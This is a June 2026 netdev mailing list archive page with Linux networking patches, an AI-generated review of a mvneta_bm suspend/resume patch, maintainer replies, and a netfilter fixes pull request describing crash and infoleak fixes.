Netdev List


* Re: [PATCH v4] net: mvneta_bm: add suspend/resume support to prevent crash after resume
From: Simon Horman @ 2026-06-20 19:00 UTC
  To: yun.zhou
  Cc: Simon Horman, marcin.s.wojtas, andrew+netdev, davem, edumazet,
	kuba, pabeni, netdev, linux-kernel
In-Reply-To: <20260618143516.1131805-1-yun.zhou@windriver.com>

This is an AI-generated review of your patch. The human sending this
email has considered the AI review valid, or at least plausible.
Full review at: https://netdev-ai.bots.linux.dev/sashiko/
---
net: mvneta_bm: add suspend/resume support to prevent crash after resume

This patch adds suspend/resume callbacks to mvneta_bm so the BM hardware
state is drained at suspend and reinitialised at resume, and adds a
device_link from mvneta to mvneta_bm so PM ordering between the two is
guaranteed. A few questions on the new paths below.

> diff --git a/drivers/net/ethernet/marvell/mvneta.c b/drivers/net/ethernet/marvell/mvneta.c
> index 0c061fb0ed07..488f2663ad2c 100644
> --- a/drivers/net/ethernet/marvell/mvneta.c
> +++ b/drivers/net/ethernet/marvell/mvneta.c
> @@ -5678,6 +5678,24 @@ static int mvneta_probe(struct platform_device *pdev)
>  					 "use SW buffer management\n");
>  				mvneta_bm_put(pp->bm_priv);
>  				pp->bm_priv = NULL;
> +			} else if (!device_link_add(&pdev->dev,
> +						    &pp->bm_priv->pdev->dev,
> +						    DL_FLAG_AUTOREMOVE_CONSUMER)) {

[Medium]
Can the existing mvneta_bm_port_init() failure path leave priv->bm_pools[i]
in a state that the new suspend handler will then double-free?

mvneta_bm_pool_use() sets new_pool->type to LONG/SHORT before calling
mvneta_bm_pool_create(). If mvneta_bm_pool_create() fails after the
dma_alloc_coherent (for example at the alignment check or
mvebu_mbus_get_dram_win_info()), it does this:

  drivers/net/ethernet/marvell/mvneta_bm.c:mvneta_bm_pool_create() {
      ...
      dma_free_coherent(&pdev->dev, sizeof(u32) * size,
                        bm_pool->virt_addr, bm_pool->phys_addr);
      return -ENOMEM;
  }

It does not zero virt_addr, and the existing probe error path here only
calls mvneta_bm_put() and sets pp->bm_priv = NULL, without invoking
mvneta_bm_pool_destroy() on the partially-initialised pool:

  if (err < 0) {
      dev_info(&pdev->dev,
               "use SW buffer management\n");
      mvneta_bm_put(pp->bm_priv);
      pp->bm_priv = NULL;
  } else if (!device_link_add(...)) {

So priv->bm_pools[i] can be left with type != FREE and a freed-but-
non-NULL virt_addr. When mvneta_bm_suspend() later runs, it skips only
on type == MVNETA_BM_FREE and unconditionally calls
dma_free_coherent(bm_pool->virt_addr, ...) on the stale pointer.

Should the suspend loop mirror mvneta_bm_pool_destroy() and guard with
"if (bm_pool->virt_addr)" before calling dma_free_coherent(), and
NULL-check after?
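
A minimal userspace sketch of the guard asked about above, under stated
assumptions: struct pool_model, pool_model_release() and pool_model_demo()
are hypothetical stand-ins, not driver code, and free() stands in for
dma_free_coherent(). The guard only helps if every path that frees the
buffer also clears the pointer, which the failing mvneta_bm_pool_create()
path described above does not appear to do.

```c
#include <assert.h>
#include <stddef.h>
#include <stdlib.h>

/* Hypothetical userspace stand-in for struct mvneta_bm_pool. */
enum pool_type { POOL_FREE, POOL_LONG, POOL_SHORT };

struct pool_model {
	enum pool_type type;
	void *virt_addr;	/* stands in for the BPPE DMA buffer */
};

/* Release a pool at most once; returns 1 if memory was actually freed. */
static int pool_model_release(struct pool_model *p)
{
	int freed = 0;

	if (p->type == POOL_FREE)
		return 0;

	if (p->virt_addr) {		/* skip pools with no live buffer */
		free(p->virt_addr);	/* dma_free_coherent() in the driver */
		p->virt_addr = NULL;	/* make any later release a no-op */
		freed = 1;
	}
	p->type = POOL_FREE;
	return freed;
}

/* Release the same pool twice; encodes both results as first * 10 + second. */
static int pool_model_demo(void)
{
	struct pool_model p = { POOL_LONG, malloc(64) };
	int first = pool_model_release(&p);
	int second = pool_model_release(&p);

	return first * 10 + second;
}
```

In this model the second release finds type == POOL_FREE and returns
early; the virt_addr check covers the separate case of a pool whose type
was set but whose buffer was never allocated or was already released and
cleared.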

> +				/*
> +				 * Link guarantees BM resumes before mvneta.
> +				 * Without it, BM may not be ready when
> +				 * mvneta_bm_port_init() runs on resume,
> +				 * causing stale buffer addresses and a crash.
> +				 * Fall back to SW management to be safe.
> +				 */
> +				dev_warn(&pdev->dev,
> +					 "failed to link to BM, use SW buffer management\n");
> +				mvneta_bm_pool_destroy(pp->bm_priv,
> +						       pp->pool_long, 1 << pp->id);
> +				mvneta_bm_pool_destroy(pp->bm_priv,
> +						       pp->pool_short, 1 << pp->id);
> +				mvneta_bm_put(pp->bm_priv);
> +				pp->bm_priv = NULL;
>  			}
>  		}
>  		/* Set RX packet offset correction for platforms, whose
> diff --git a/drivers/net/ethernet/marvell/mvneta_bm.c b/drivers/net/ethernet/marvell/mvneta_bm.c
> index 6bb380494919..85162a43eaf6 100644
> --- a/drivers/net/ethernet/marvell/mvneta_bm.c
> +++ b/drivers/net/ethernet/marvell/mvneta_bm.c
> @@ -477,6 +477,63 @@ static void mvneta_bm_remove(struct platform_device *pdev)
>  	clk_disable_unprepare(priv->clk);
>  }
>  
> +static int mvneta_bm_suspend(struct device *dev)
> +{
> +	struct mvneta_bm *priv = dev_get_drvdata(dev);
> +	int i;
> +
> +	/* Drain buffers and free pool resources while BM is still clocked */
> +	for (i = 0; i < MVNETA_BM_POOLS_NUM; i++) {
> +		struct mvneta_bm_pool *bm_pool = &priv->bm_pools[i];
> +		int size_bytes;
> +
> +		if (bm_pool->type == MVNETA_BM_FREE)
> +			continue;
> +
> +		mvneta_bm_bufs_free(priv, bm_pool, bm_pool->port_map);
> +		if (bm_pool->hwbm_pool.buf_num)
> +			dev_warn(&priv->pdev->dev,
> +				 "pool %d: %d buffers not freed\n",
> +				 bm_pool->id, bm_pool->hwbm_pool.buf_num);
> +
> +		size_bytes = sizeof(u32) * bm_pool->hwbm_pool.size;
> +		dma_free_coherent(&priv->pdev->dev, size_bytes,
> +				  bm_pool->virt_addr, bm_pool->phys_addr);
> +		bm_pool->virt_addr = NULL;
> +		bm_pool->type = MVNETA_BM_FREE;
> +	}
> +
> +	mvneta_bm_write(priv, MVNETA_BM_COMMAND_REG, MVNETA_BM_STOP_MASK);
> +	clk_disable_unprepare(priv->clk);
> +	return 0;
> +}

[Medium]
Why does this loop not call mvneta_bm_pool_disable() (or otherwise clear
MVNETA_BM_POOL_ENABLE_MASK in BASE_REG) per pool the way
mvneta_bm_pool_destroy() does?

mvneta_bm_pool_destroy() clears the per-pool enable bit before the
dma_free_coherent of the BPPE region. The new suspend ordering is
instead drain via BPPI -> dma_free_coherent(BPPE) -> next pool -> a
single global MVNETA_BM_STOP_MASK write at the end.

mvneta_bm_bufs_free() also clears MVNETA_BM_EMPTY_LIMIT_MASK on exit,
which re-enables auto-refill:

  drivers/net/ethernet/marvell/mvneta_bm.c:mvneta_bm_bufs_free() {
      ...
      mvneta_bm_config_clear(priv, MVNETA_BM_EMPTY_LIMIT_MASK);
      ...
  }

Between dma_free_coherent() for one pool's BPPE and the eventual global
STOP, BM hardware still has BASE_REG pointing at the freed phys_addr
with ENABLE_MASK set. Would matching mvneta_bm_remove()'s
"mvneta_bm_pool_destroy() per pool, then global STOP" ordering be safer
here?

[Low]
Resetting bm_pool->type to MVNETA_BM_FREE causes mvneta_bm_pool_use()
to re-enter its initialisation branch on every resume cycle, which
includes:

  mutex_init(&hwbm_pool->buf_lock);

on a struct mutex that was already initialised at first use. Repeated
mutex_init() on a previously-initialised mutex discards lockdep history
for that lock.

Could suspend either call mutex_destroy() on buf_lock to pair the
re-init, or leave bm_pool->type unchanged and only clear the dynamic
state (virt_addr, buf_num) so mvneta_bm_pool_use() does not re-enter
the init branch?

> +
> +static int mvneta_bm_resume(struct device *dev)
> +{
> +	struct mvneta_bm *priv = dev_get_drvdata(dev);
> +	int i, err;
> +
> +	err = clk_prepare_enable(priv->clk);
> +	if (err)
> +		return err;
> +
> +	/* Reinitialize BM hardware; pools are refilled by mvneta_resume() */
> +	mvneta_bm_default_set(priv);
> +
> +	/* Restore pool registers lost during clock gating */
> +	for (i = 0; i < MVNETA_BM_POOLS_NUM; i++) {
> +		mvneta_bm_write(priv, MVNETA_BM_POOL_READ_PTR_REG(i), 0);
> +		mvneta_bm_write(priv, MVNETA_BM_POOL_WRITE_PTR_REG(i), 0);
> +		mvneta_bm_write(priv, MVNETA_BM_POOL_SIZE_REG(i),
> +				priv->bm_pools[i].hwbm_pool.size);
> +	}
> +
> +	mvneta_bm_write(priv, MVNETA_BM_COMMAND_REG, MVNETA_BM_START_MASK);
> +	return 0;
> +}

[Medium]
The comment says "Restore pool registers lost during clock gating", but
the loop only restores SIZE_REG, READ_PTR_REG and WRITE_PTR_REG, and
does not touch MVNETA_BM_POOL_BASE_REG (which carries the BPPE physical
address and the per-pool MVNETA_BM_POOL_ENABLE_MASK).

Combined with mvneta_bm_suspend() not clearing the per-pool ENABLE_MASK
before clk_disable_unprepare(), MVNETA_BM_START_MASK is being written
here with each BASE_REG in an unspecified state.

If the IP retains BASE_REG content across clock gating, BM would be
started with stale BPPE phys_addrs (now freed memory) and ENABLE_MASK
set, until mvneta_resume() drives mvneta_bm_pool_create() to overwrite
BASE_REG.

Could resume explicitly clear each MVNETA_BM_POOL_BASE_REG (or at least
its ENABLE_MASK) before writing START_MASK, or could suspend clear the
per-pool ENABLE_MASK before disabling the clock?


* Re: Ethtool : PRBS feature
From: Andrew Lunn @ 2026-06-20 19:20 UTC
  To: Maxime Chevallier
  Cc: Das, Shubham, Alexander H Duyck, lee@trager.us,
	netdev@vger.kernel.org, mkubecek@suse.cz, D H, Siddaraju,
	Chintalapalle, Balaji, Lindberg, Magnus,
	niklas.damberg@ericsson.com
In-Reply-To: <be5c474b-c969-49af-8235-825580ee945c@bootlin.com>

On Sat, Jun 20, 2026 at 04:39:06PM +0200, Maxime Chevallier wrote:
> Hi,
> 
> On 6/20/26 15:48, Das, Shubham wrote:
> >> Can you change the firmware to expose the 802.3 registers for PRBS?
> >> You can then write a library which both phylib and your driver can use.
> > 
> > Andrew,
> > 
> > No, exposing the PRBS registers to drivers is not possible in our design (the registers are buried deep within the Accelerator/NIC/PHY/Analog IP hierarchy).
> > 
> > Additionally, the PHY PRBS registers are not in accordance with the IEEE Clause 45 definitions. For instance, the PRBS registers are paged and 32-bit wide.
> > 

Hi Shubham

Do you at least have the functionality of the standard C45 registers,
even if the addresses and bit fields are messed up?

If you do, maybe we should actually start with a C45 conforming
implementation, and then you can do a translation layer to whatever
oddball implementation you have?

> > Given these constraints, we think ethtool --phy-test is a
> > reasonable starting point for exposing the long-established
> > Ethernet PRBS functionality to Linux userspace, as it aligns well
> > with the driver-owned NIC architecture model.

I agree an ethtool --phy-test makes sense, but we need to ensure
standards-based C45 functionality is covered, not just your oddball
vendor functionality.

	Andrew


* Re: [PATCH net] net: phylink: print correct c45 phy id when missing PHY driver
From: Andrew Lunn @ 2026-06-20 19:24 UTC
  To: Aleksander Jan Bajkowski
  Cc: linux, hkallweit1, davem, edumazet, kuba, pabeni, rmk+kernel,
	vladimir.oltean, netdev, linux-kernel
In-Reply-To: <20260620131130.949298-1-olek2@wp.pl>

On Sat, Jun 20, 2026 at 03:11:13PM +0200, Aleksander Jan Bajkowski wrote:
> If no PHY driver is found, `phy_id` is returned. `phy_id` holds the c22 ID.
> Modules with a rollball bridge support only c45 transfers. The c45 IDs are
> stored in the `c45_ids` structure. In the current code these modules report
> an ID 0x00000000. This may lead users to mistakenly conclude that the
> rollball bridge isn't properly implemented in their SFP module. This patch
> fixes the wrong IDs for c45 modules when a driver cannot be found.

The problem with C45 is there is not one ID, but multiple IDs. And
they can be from different vendors, depending on who the different IP
blocks have been licensed from.

We came to the conclusion that not reporting any C45 IDs is the most
meaningful thing to do.

      Andrew


* [PATCH net] net, bpf: check master for NULL in xdp_master_redirect()
From: Xiang Mei @ 2026-06-20 20:15 UTC
  To: Daniel Borkmann, Martin KaFai Lau, Jesper Dangaard Brouer,
	Jiayuan Chen, netdev, bpf
  Cc: John Fastabend, Stanislav Fomichev, Alexei Starovoitov,
	Jussi Maki, Paolo Abeni, Weiming Shi, Xiang Mei

xdp_master_redirect() dereferences the result of
netdev_master_upper_dev_get_rcu() without a NULL check, but that helper
returns NULL when the receiving device has no upper-master adjacency.

The reach guard only checks netif_is_bond_slave(). On bond slave release
bond_upper_dev_unlink() drops the upper-master adjacency before clearing
IFF_SLAVE, so an XDP_TX reaching xdp_master_redirect() in that window
still passes netif_is_bond_slave() while master is already NULL, and
faults on master->flags at offset 0xb0:

  BUG: kernel NULL pointer dereference, address: 00000000000000b0
  RIP: 0010:xdp_master_redirect (net/core/filter.c:4432)
  Call Trace:
   xdp_master_redirect (net/core/filter.c:4432)
   bpf_prog_run_generic_xdp (include/net/xdp.h:700)
   do_xdp_generic (net/core/dev.c:5608)
   __netif_receive_skb_one_core (net/core/dev.c:6204)
   process_backlog (net/core/dev.c:6319)
   __napi_poll (net/core/dev.c:7729)
   net_rx_action (net/core/dev.c:7792)
   handle_softirqs (kernel/softirq.c:622)
   __dev_queue_xmit (include/linux/bottom_half.h:33)
   packet_sendmsg (net/packet/af_packet.c:3082)
   __sys_sendto (net/socket.c:2252)
  Kernel panic - not syncing: Fatal exception in interrupt

The missing check dates back to the original code; commit 1921f91298d1
("net, bpf: fix null-ptr-deref in xdp_master_redirect() for down master")
later added the master->flags read where the fault now lands but kept the
unconditional deref. Check master for NULL before use; a NULL master is
treated the same as one that is not up.

Fixes: 879af96ffd72 ("net, core: Add support for XDP redirection to slave device")
Reported-by: Weiming Shi <bestswngs@gmail.com>
Assisted-by: Claude:claude-opus-4-8
Signed-off-by: Xiang Mei <xmei5@asu.edu>
---
 net/core/filter.c | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/net/core/filter.c b/net/core/filter.c
index 40037413dd4e..6037860d5283 100644
--- a/net/core/filter.c
+++ b/net/core/filter.c
@@ -4430,7 +4430,7 @@ u32 xdp_master_redirect(struct xdp_buff *xdp)
 	struct net_device *master, *slave;

 	master = netdev_master_upper_dev_get_rcu(xdp->rxq->dev);
-	if (unlikely(!(master->flags & IFF_UP)))
+	if (unlikely(!master || !(master->flags & IFF_UP)))
 		return XDP_ABORTED;
 	slave = master->netdev_ops->ndo_xdp_get_xmit_slave(master, xdp);
 	if (slave && slave != xdp->rxq->dev) {
-- 
2.43.0


* Re: Bug#1130336: [regression] Network failure beyond first connection after 69894e5b4c5e ("netfilter: nft_connlimit: update the count if add was skipped")
From: Salvatore Bonaccorso @ 2026-06-20 20:44 UTC
  To: Fernando Fernandez Mancera
  Cc: Thorsten Leemhuis, Alejandro Oliván Alvarez, 1130336,
	Florian Westphal, Pablo Neira Ayuso, Phil Sutter, David S. Miller,
	Eric Dumazet, Jakub Kicinski, Paolo Abeni, Simon Horman,
	netfilter-devel, coreteam, netdev, linux-kernel, regressions,
	stable
In-Reply-To: <f67a985f-c6a0-4796-b255-59d99e317b6f@suse.de>

Hi Fernando,

On Wed, Apr 22, 2026 at 12:32:34PM +0200, Fernando Fernandez Mancera wrote:
> On 4/22/26 11:18 AM, Thorsten Leemhuis wrote:
> > Lo! Top-posting on purpose to make this easy to process.
> > 
> > What happened to this regression? It looks a bit like things stalled and
> > fell through the cracks. Or Fernando, did you post a patch like you
> > mentioned? I looked for one referring the commit or the reporter, but
> > could not find anything -- but maybe I missed it.
> > 
> 
> Yes, it stalled and fell through the cracks. Let me prepare a fix as I
> mentioned.

Did that happen? On a quick check, at least 7.0.13 upstream still seems
to exhibit the problem (or would it be fair to let this use case rest?)

Regards,
Salvatore


* [PATCH net] net: ti: icssg-prueth: fix XDP_TX from the AF_XDP zero-copy RX path
From: David Carlier @ 2026-06-20 21:37 UTC
  To: danishanwar, rogerq, andrew+netdev, netdev
  Cc: davem, edumazet, kuba, pabeni, horms, m-malladi, hawk,
	john.fastabend, sdf, ast, daniel, bpf, linux-arm-kernel,
	linux-kernel, stable, David Carlier

On XDP_TX from the zero-copy RX path, emac_run_xdp() converts the xsk
buffer via xdp_convert_zc_to_xdp_frame(), which clones the data into a
fresh MEM_TYPE_PAGE_ORDER0 page that is not DMA mapped. Transmitting it
as PRUETH_TX_BUFF_TYPE_XDP_TX derives the DMA address with
page_pool_get_dma_addr(), reading an uninitialized page->dma_addr, so
the device DMAs from a bogus address (corrupt TX, or an IOMMU fault).

Pick the TX buffer type from the frame's memory type: keep
PRUETH_TX_BUFF_TYPE_XDP_TX for page_pool frames and use
PRUETH_TX_BUFF_TYPE_XDP_NDO for the cloned zero-copy frame. The
completion path already unmaps PRUETH_SWDATA_XDPF buffers.

Fixes: 7a64bb388df3 ("net: ti: icssg-prueth: Add AF_XDP zero copy for RX")
Cc: stable@vger.kernel.org
Signed-off-by: David Carlier <devnexen@gmail.com>
---
 drivers/net/ethernet/ti/icssg/icssg_common.c | 13 ++++++++++++-
 1 file changed, 12 insertions(+), 1 deletion(-)

diff --git a/drivers/net/ethernet/ti/icssg/icssg_common.c b/drivers/net/ethernet/ti/icssg/icssg_common.c
index 82ddef9c17d5..302e700ea17d 100644
--- a/drivers/net/ethernet/ti/icssg/icssg_common.c
+++ b/drivers/net/ethernet/ti/icssg/icssg_common.c
@@ -804,6 +804,7 @@ EXPORT_SYMBOL_GPL(emac_xmit_xdp_frame);
  */
 static u32 emac_run_xdp(struct prueth_emac *emac, struct xdp_buff *xdp, u32 *len)
 {
+	enum prueth_tx_buff_type tx_buff_type;
 	struct net_device *ndev = emac->ndev;
 	struct netdev_queue *netif_txq;
 	int cpu = smp_processor_id();
@@ -826,11 +827,21 @@ static u32 emac_run_xdp(struct prueth_emac *emac, struct xdp_buff *xdp, u32 *len
 			goto drop;
 		}
 
+		/* In AF_XDP zero-copy mode xdp_convert_buff_to_frame()
+		 * clones the xsk buffer into a fresh MEM_TYPE_PAGE_ORDER0
+		 * page that is not DMA mapped. Such a frame must be mapped
+		 * via the NDO path; only a page pool-backed frame already
+		 * carries a usable page_pool DMA address.
+		 */
+		tx_buff_type = xdpf->mem_type == MEM_TYPE_PAGE_POOL ?
+				PRUETH_TX_BUFF_TYPE_XDP_TX :
+				PRUETH_TX_BUFF_TYPE_XDP_NDO;
+
 		q_idx = cpu % emac->tx_ch_num;
 		netif_txq = netdev_get_tx_queue(ndev, q_idx);
 		__netif_tx_lock(netif_txq, cpu);
 		result = emac_xmit_xdp_frame(emac, xdpf, q_idx,
-					     PRUETH_TX_BUFF_TYPE_XDP_TX);
+					     tx_buff_type);
 		__netif_tx_unlock(netif_txq);
 		if (result == ICSSG_XDP_CONSUMED) {
 			ndev->stats.tx_dropped++;
-- 
2.53.0



* [PATCH net,v2 00/14] Netfilter fixes for net
From: Pablo Neira Ayuso @ 2026-06-20 22:27 UTC
  To: netfilter-devel; +Cc: davem, netdev, kuba, pabeni, edumazet, fw, horms

This is v2, dropping two patches that need a bit more work,
uncovered by sashiko. I have revisited the wording of this cover
letter to refine it.

-o-

Hi,
 
The following patchset contains Netfilter fixes for net. This batch
combines fixes for real crashes with trivial/correctness fixes. There
is also a rework of the conntrack expectation timeout strategy to deal
with a possible race when removing an expectation.
 
1) Fix the incorrect flowtable timeout extension for entries in
   hw offload, from Adrian Bente. This is correcting a defect in
   the functionality, no crash.
 
2) Hold reference to device under the fake dst in br_netfilter,
   from Haoze Xie. This is fixing a possible UaF if the device
   is removed while packet is sitting in nfqueue.
 
3) Reject template conntrack in xt_cluster, otherwise access to
   uninitialized conntrack fields is possible, leading to a WARN_ON
   due to an unset layer 3 protocol. From Wyatt Feng.
 
4) Make sure the IPv6 tunnel header is in the linear skb data
   area before pulling. While at it, remove incomplete NEXTHDR_DEST
   support. From Lorenzo Bianconi. Without the fix, a crash is
   possible if the IPv4 header is not in the linear area.
 
5) Use test_bit_acquire in ipset hash set to avoid reordering
   of subsequent memory accesses. This addresses an LLM-related
   report; no crash has been observed. From Jozsef Kadlecsik.
 
6) Use test_bit_acquire in ipset bitmap set too, for the same
   reason as in the previous patch, from Jozsef Kadlecsik.
 
7) Call kfree_rcu() after rcu_assign_pointer() to address a
   possible UaF if kfree_rcu() runs immediately, which to my
   understanding never happens. Never observed in practice,
   reported by LLM. Also from Jozsef Kadlecsik.

8) Use disable_delayed_work_sync() instead of cancel_delayed_work_sync()
   to prevent the ipset GC handler from re-queueing work, as reported
   by LLM. From Jozsef Kadlecsik. This is for correctness.
 
9) Restore the check in nft_payload for payload offsets that do not
   fit in 16 bits (above 65535). From Florian Westphal. This fixes a
   silent truncation, not a big deal, but better be assertive and
   reject it.
 
10) Validate that NFT_META_BRI_IIFHWADDR can only run from bridge
    prerouting. From Florian Westphal. Harmless, but it could allow
    reading bytes from skb->cb.
 
11) Zero out destination hardware address during the flowtable
    path setup, also from Florian. This is a correctness fix; an LLM
    points out that an infoleak is possible, but the topology needed
    to achieve it is not clear.

12) Skip IPv4 options if present when building the IPv4 reject reply.
    Otherwise bytes in the IPv4 options header can be sent back to
    origin where the ICMP header is expected. Again from
    Florian Westphal.
 
13) Replace the timer API for expectations with a GC worker approach.
    This implicitly fixes a race in nf_ct_remove_expectations(),
    which might fail to remove the expectation because timer_del()
    returns false when the timer has expired and its callback is
    running concurrently. This fix addresses a crash that has
    already been reported with a reproducer.

14) Check if br_vlan_get_pvid_rcu() fails, otherwise a stack
    infoleak of 4 bytes is possible. From Florian Westphal.

Please, pull these changes from:

  git://git.kernel.org/pub/scm/linux/kernel/git/netfilter/nf.git nf-26-06-21

Thanks.

----------------------------------------------------------------

The following changes since commit 96e7f9122aae0ed000ee321f324b812a447906d9:

  eth: fbnic: take netif_addr_lock_bh() around rx mode address programming (2026-06-18 18:36:26 -0700)

are available in the Git repository at:

  git://git.kernel.org/pub/scm/linux/kernel/git/netfilter/nf.git tags/nf-26-06-21

for you to fetch changes up to 27dd2997746d54ebc079bb13161cc1bdd401d4a6:

  netfilter: nft_meta_bridge: fix NFT_META_BRI_IIFPVID stack leak (2026-06-21 00:18:37 +0200)

----------------------------------------------------------------
netfilter pull request 26-06-21

----------------------------------------------------------------
Adrian Bente (1):
      netfilter: flowtable: fix offloaded ct timeout never being extended

Florian Westphal (5):
      netfilter: nft_payload: reject offsets exceeding 65535 bytes
      netfilter: nft_meta_bridge: add validate callback for get operations
      netfilter: nft_flow_offload: zero device address for non-ether case
      netfilter: nf_reject: skip iphdr options when looking for icmp header
      netfilter: nft_meta_bridge: fix NFT_META_BRI_IIFPVID stack leak

Haoze Xie (1):
      netfilter: nf_queue: pin bridge device while NFQUEUE holds fake dst

Jozsef Kadlecsik (4):
      netfilter: ipset: Don't use test_bit() in lockless RCU readers in hash types
      netfilter: ipset: Don't use test_bit() in lockless RCU readers in bitmap types
      netfilter: ipset: fix order of kfree_rcu() and rcu_assign_pointer()
      netfilter: ipset: make sure gc is properly stopped

Lorenzo Bianconi (1):
      netfilter: flowtable: fix and simplify IP6IP6 tunnel handling

Pablo Neira Ayuso (1):
      netfilter: nf_conntrack_expect: use conntrack GC to reap expectations

Wyatt Feng (1):
      netfilter: xt_cluster: reject template conntracks in hash match

 include/net/netfilter/nf_conntrack_expect.h        |  16 ++-
 include/net/netfilter/nf_queue.h                   |   1 +
 include/net/netfilter/nft_meta.h                   |   2 +
 include/uapi/linux/netfilter/nf_conntrack_common.h |   1 +
 net/bridge/netfilter/nft_meta_bridge.c             |  23 +++-
 net/ipv4/netfilter/nf_reject_ipv4.c                |   2 +-
 net/ipv6/ip6_tunnel.c                              |   7 +
 net/netfilter/ipset/ip_set_bitmap_gen.h            |   4 +-
 net/netfilter/ipset/ip_set_bitmap_ip.c             |   2 +-
 net/netfilter/ipset/ip_set_bitmap_ipmac.c          |   2 +-
 net/netfilter/ipset/ip_set_bitmap_port.c           |   2 +-
 net/netfilter/ipset/ip_set_core.c                  |   4 +-
 net/netfilter/ipset/ip_set_hash_gen.h              |  12 +-
 net/netfilter/nf_conntrack_core.c                  |  33 ++++-
 net/netfilter/nf_conntrack_expect.c                | 145 ++++++++++-----------
 net/netfilter/nf_conntrack_h323_main.c             |   4 +-
 net/netfilter/nf_conntrack_helper.c                |  10 +-
 net/netfilter/nf_conntrack_netlink.c               |  22 ++--
 net/netfilter/nf_conntrack_sip.c                   |  13 +-
 net/netfilter/nf_flow_table_core.c                 |  13 +-
 net/netfilter/nf_flow_table_ip.c                   |  80 +++---------
 net/netfilter/nf_flow_table_path.c                 |   4 +-
 net/netfilter/nf_queue.c                           |  14 ++
 net/netfilter/nfnetlink_queue.c                    |   3 +
 net/netfilter/nft_ct.c                             |   3 +-
 net/netfilter/nft_meta.c                           |   5 +-
 net/netfilter/nft_payload.c                        |  16 ++-
 net/netfilter/xt_cluster.c                         |   2 +-
 .../selftests/net/netfilter/nft_flowtable.sh       |   8 +-
 29 files changed, 254 insertions(+), 199 deletions(-)


* [PATCH net 01/14] netfilter: flowtable: fix offloaded ct timeout never being extended
From: Pablo Neira Ayuso @ 2026-06-20 22:27 UTC
  To: netfilter-devel; +Cc: davem, netdev, kuba, pabeni, edumazet, fw, horms
In-Reply-To: <20260620222738.112506-1-pablo@netfilter.org>

From: Adrian Bente <adibente@gmail.com>

OpenWrt has recently migrated many platforms to kernel 6.18. On the
MediaTek platform, which supports hardware network offloading, WiFi
connections accelerated via the WED path were observed to drop after
roughly 300 seconds.

After several debugging sessions, assisted by the Claude LLM, the
problem was narrowed down as follows:

nf_flow_table_extend_ct_timeout() extends ct->timeout for offloaded
flows using:

	cmpxchg(&ct->timeout, expires, new_timeout);

'expires' comes from nf_ct_expires(ct) and is a relative value, while
ct->timeout holds an absolute timestamp. The two are never equal, so
the cmpxchg always fails and the timeout is never extended.

This goes unnoticed for most flows, but a long-lived hardware (WED)
offloaded flow on MediaTek MT7986 eventually has ct->timeout decay to
zero; the conntrack entry is then reaped and the connection breaks.

Open-code the relative value from a single READ_ONCE(ct->timeout)
snapshot and compare against that same absolute snapshot in the
cmpxchg, so the timeout extension actually takes effect while the
datapath remains authoritative if it updates ct->timeout concurrently.
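
The mismatch described above can be reproduced in a small userspace
sketch. Everything named here is a hypothetical stand-in: timeout_model
plays the role of ct->timeout, the 'now' argument plays the role of
nfct_time_stamp, and C11 atomic_compare_exchange_strong() stands in for
the kernel's cmpxchg(). It is an illustration of the compare semantics
only, not the kernel implementation.

```c
#include <assert.h>
#include <stdatomic.h>
#include <stdint.h>

/* Hypothetical stand-in for ct->timeout: an absolute tick count. */
static _Atomic uint32_t timeout_model;

/* Old shape: the absolute field is compared against a relative value. */
static int extend_with_relative(uint32_t now, uint32_t new_rel)
{
	uint32_t expected = atomic_load(&timeout_model) - now; /* relative */

	return atomic_compare_exchange_strong(&timeout_model, &expected,
					      now + new_rel);
}

/* New shape: one snapshot feeds both the remaining-time test and the compare. */
static int extend_with_snapshot(uint32_t now, uint32_t min_rel,
				uint32_t new_rel)
{
	uint32_t snap = atomic_load(&timeout_model);
	int32_t remaining = (int32_t)(snap - now);

	/* Already expired, or still large enough: nothing to do. */
	if (remaining <= 0 || remaining >= (int32_t)min_rel)
		return 0;

	/* Fails only if someone else changed the field since the snapshot. */
	return atomic_compare_exchange_strong(&timeout_model, &snap,
					      now + new_rel);
}
```

With the field at 1050 and now at 1000, the first helper compares 1050
against 50 and leaves the field untouched, while the second compares
1050 against 1050 and stores the extended value.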

Fixes: 03428ca5cee9 ("netfilter: conntrack: rework offload nf_conn timeout extension logic")
Cc: stable@vger.kernel.org
Suggested-by: Florian Westphal <fw@strlen.de>
Signed-off-by: Adrian Bente <adibente@gmail.com>
Signed-off-by: Pablo Neira Ayuso <pablo@netfilter.org>
---
 net/netfilter/nf_flow_table_core.c | 13 +++++++++----
 1 file changed, 9 insertions(+), 4 deletions(-)

diff --git a/net/netfilter/nf_flow_table_core.c b/net/netfilter/nf_flow_table_core.c
index 785d8c244a77..99c5b9d671a0 100644
--- a/net/netfilter/nf_flow_table_core.c
+++ b/net/netfilter/nf_flow_table_core.c
@@ -505,8 +505,13 @@ static u32 nf_flow_table_tcp_timeout(const struct nf_conn *ct)
  */
 static void nf_flow_table_extend_ct_timeout(struct nf_conn *ct)
 {
-	static const u32 min_timeout = 5 * 60 * HZ;
-	u32 expires = nf_ct_expires(ct);
+	static const s32 min_timeout = 5 * 60 * HZ;
+	u32 ct_timeout = READ_ONCE(ct->timeout);
+	s32 expires;
+
+	expires = ct_timeout - nfct_time_stamp;
+	if (expires <= 0) /* already expired */
+		return;

 	/* normal case: large enough timeout, nothing to do. */
 	if (likely(expires >= min_timeout))
@@ -524,7 +529,7 @@ static void nf_flow_table_extend_ct_timeout(struct nf_conn *ct)
 	if (nf_ct_is_confirmed(ct) &&
 	    test_bit(IPS_OFFLOAD_BIT, &ct->status)) {
 		u8 l4proto = nf_ct_protonum(ct);
-		u32 new_timeout = true;
+		u32 new_timeout = 1;

 		switch (l4proto) {
 		case IPPROTO_UDP:
@@ -549,7 +554,7 @@ static void nf_flow_table_extend_ct_timeout(struct nf_conn *ct)
 		 */
 		if (new_timeout) {
 			new_timeout += nfct_time_stamp;
-			cmpxchg(&ct->timeout, expires, new_timeout);
+			cmpxchg(&ct->timeout, ct_timeout, new_timeout);
 		}
 	}

-- 
2.47.3


* [PATCH net 02/14] netfilter: nf_queue: pin bridge device while NFQUEUE holds fake dst
From: Pablo Neira Ayuso @ 2026-06-20 22:27 UTC
  To: netfilter-devel; +Cc: davem, netdev, kuba, pabeni, edumazet, fw, horms
In-Reply-To: <20260620222738.112506-1-pablo@netfilter.org>

From: Haoze Xie <royenheart@gmail.com>

The br_netfilter fake rtable is embedded in struct net_bridge and is
attached to bridged packets with skb_dst_set_noref(). If such a packet is
queued to NFQUEUE, __nf_queue() upgrades that fake dst with
skb_dst_force().

At that point the queued skb can hold a real dst reference after bridge
